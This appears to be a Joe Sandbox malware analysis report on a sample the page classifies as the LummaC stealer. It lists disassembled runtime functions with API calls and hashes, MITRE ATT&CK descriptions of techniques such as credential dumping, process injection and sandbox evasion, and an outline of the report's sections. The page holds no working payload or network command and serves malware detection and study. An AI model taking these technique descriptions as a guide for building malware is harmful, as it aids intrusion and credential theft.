Function 008D6073 Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,?,00000000,008D5F06,00000000,?,008DB60B,008D5F06,008D5F06,008C6E9E,?,00000000,00000104,?,00000001), ref: 008D6089
GetLastError.KERNEL32(?,008DB60B,008D5F06,008D5F06,008C6E9E,?,00000000,00000104,?,00000001,00000000,00000000,?,008D5F06,?,00000104), ref: 008D6093
__dosmaperr.LIBCMT ref: 008D609A
GetFullPathNameW.KERNEL32(?,?,?,00000000,?,?,008DB60B,008D5F06,008D5F06,008C6E9E,?,00000000,00000104,?,00000001,00000000), ref: 008D60C4

Memory Dump Source

Source File: 00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Offset: 00880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: FullNamePath$ErrorLast__dosmaperr
String ID:
API String ID: 1391015842-0
Opcode ID: a72e1de69e8ac08235e0b59f4006df7dc26bf1db3731920fcb84235d1ad79fd5
Instruction ID: 3f62a7a2ce49e12150ce6c476b032970bf32c2b77e09dd05c41f9f44e44cbfdc
Opcode Fuzzy Hash: a72e1de69e8ac08235e0b59f4006df7dc26bf1db3731920fcb84235d1ad79fd5
Instruction Fuzzy Hash: 77F0A436200A14AFDB205B76DC04E5BBBADFF44360710892AF556D2620EBB1EC208B61

Function 0045BD08 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,00455523,00000000,00000000,00000000,?,00459F6A,00000000,00000001,00000000,?,?,00450B47,?,00455523,00000000), ref: 0045BD1F
GetLastError.KERNEL32(?,00459F6A,00000000,00000001,00000000,?,?,00450B47,?,00455523,00000000,?,?,?,00450492,00443CFB), ref: 0045BD2B

Part of subcall function 0045BD7C: CloseHandle.KERNEL32(FFFFFFFE,0045BD3B,?,00459F6A,00000000,00000001,00000000,?,?,00450B47,?,00455523,00000000,?,?), ref: 0045BD8C

___initconout.LIBCMT ref: 0045BD3B

Part of subcall function 0045BD5D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0045BCF9,00459F57,?,?,00450B47,?,00455523,00000000,?), ref: 0045BD70

WriteConsoleW.KERNEL32(00000000,00455523,00000000,00000000,?,00459F6A,00000000,00000001,00000000,?,?,00450B47,?,00455523,00000000,?), ref: 0045BD50

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: c2a2ecc1c2a42e22a3f830c2b4be3aaf5d7a6f5fb3480db1df2f59ef4a2b949f
Instruction ID: a34e4e029ef2e4d5dd3ba3bcd054cc3c3a598788143b8b19420d5231d0b345e8
Opcode Fuzzy Hash: c2a2ecc1c2a42e22a3f830c2b4be3aaf5d7a6f5fb3480db1df2f59ef4a2b949f
Instruction Fuzzy Hash: 0CF0F836140119BBCF221F959C08ADA3F3AEF493A1F044021FE09D5171D7B28864ABD9

Function 008BD9D7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 122COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 008BDA16
__IsNonwritableInCurrentImage.LIBCMT ref: 008BDACA

Strings

csm, xrefs: 008BDAB4

Memory Dump Source

Source File: 00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Offset: 00880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: 4e5ede0b4027151e909a7cfdd177c32462acfec368dfe8ef4ee5f082c53f6a08
Instruction ID: aa2279353376ec55a6621422434af98a83bfdfc9dda819fca65ccded91cce0d9
Opcode Fuzzy Hash: 4e5ede0b4027151e909a7cfdd177c32462acfec368dfe8ef4ee5f082c53f6a08
Instruction Fuzzy Hash: E2419030A04219ABCF10DF68C880ADE7FB5FF45314F148199E818DB392E775EA05CB92

Function 0045962F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 004598A6

Strings

csm, xrefs: 00459939
csm, xrefs: 004598C8

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: ___except_validate_context_record
String ID: csm$csm
API String ID: 3493665558-3733052814
Opcode ID: 2ddf6b46ba9927e19a1a0e06cd3d58e98e189ea3bbd4e4ea7d064f6212a0d210
Instruction ID: 4df6c2a030d07bf616ce91cf83237d0554f1a363a859cf179326f8a266afaebb
Opcode Fuzzy Hash: 2ddf6b46ba9927e19a1a0e06cd3d58e98e189ea3bbd4e4ea7d064f6212a0d210
Instruction Fuzzy Hash: 0E31C4B6400219EBCF269F51CC4096A7B65FF0A716B18419FFC5449323C73ACC66DB8A

Function 008D9896 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 008D9B0D

Strings

csm, xrefs: 008D9B2F
csm, xrefs: 008D9BA0

Memory Dump Source

Source File: 00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Offset: 00880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: ___except_validate_context_record
String ID: csm$csm
API String ID: 3493665558-3733052814
Opcode ID: bd77938e174d17ab149a6bce2b14a2ddc10501c9168853feaa912111e58622ef
Instruction ID: a64d31d140b149e9fb0911022cbbf58af9256a9b203aa70141654bcd35a0955b
Opcode Fuzzy Hash: bd77938e174d17ab149a6bce2b14a2ddc10501c9168853feaa912111e58622ef
Instruction Fuzzy Hash: 3631A372400228DBCF265F54EC4596A7B66FF09325B1A435BF8D489321C733CC61DB81

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Driver: Driver Load, File: File Creation, File: File Modification, Module: Module Load
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report OlZzqwjrwO.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_OlZzqwjrwO.exe_4fdcd3b2b921635830a475eceee09d6edfdd598_6c3c4747_a375bc04-6242-4226-8397-353148cc3996\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER504.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5A1.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5C2.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Windows Analysis Report
OlZzqwjrwO.exe

Function 00405AAA Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 448
stringCOMMON

Function 0040620B Relevance: 21.4, APIs: 8, Strings: 4, Instructions: 445
stringCOMMON

Function 0042B9C5 Relevance: 16.7, Strings: 13, Instructions: 436
COMMON

Function 0040A928 Relevance: 16.2, APIs: 5, Strings: 4, Instructions: 475
stringCOMMON

Function 0042FD35 Relevance: 14.1, Strings: 11, Instructions: 308
COMMON

Function 004262A1 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 391
libraryCOMMON

Function 0040B129 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 375
nativefileCOMMON